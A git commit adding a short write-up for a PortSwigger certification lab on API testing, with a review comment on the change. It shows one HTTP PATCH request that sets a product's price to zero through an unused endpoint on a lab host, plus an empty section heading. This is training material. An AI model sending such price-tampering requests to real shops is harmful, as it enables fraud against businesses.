feat(bscp): start with api testing labs
Sirius-A committed May 14, 2024
1 parent 81cd780 commit fa6da2d
Showing 1 changed file with 20 additions and 0 deletions.
20 changes: 20 additions & 0 deletions docs/writeups/2023/portswigger-bscp-labs/api-hacking.md
Original file line number Diff line number Diff line change
@@ -0,0 +1,20 @@
# API Testing

## Finding and exploiting an unused API endpoint

The `price` endpont not only allows the `GET` methode but also `PATCH`

```
PATCH /api/products/1/price HTTP/2
Host: 0ad10068036333308060530f007800d6.web-security-academy.net
Cookie: session=f1t8Tfqc7LY7RwwMuWYwYG5mA2CxkpFc
[...]
Content-Type: application/json;charset=UTF-8
Content-Length: 12
{"price": 0}
```

## Exploiting a mass assignment vulnerability


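Review bot: The "Exploiting a mass assignment vulnerability" heading at the end of the hunk has no body, and the first section shows the PATCH request against `/api/products/1/price` without recording how the unused method was found; either fill in the mass assignment section or drop the heading until the lab is written up, and add the discovery step before the request (for example, the response to an OPTIONS request against the `price` endpoint, or whichever method probe revealed PATCH), since "Finding" is half of the lab title. Also fix the typos on the first body line ("endpont" -> "endpoint", "methode" -> "method") and consider redacting the `session=` cookie value, as the request block is otherwise copied verbatim from the lab instance.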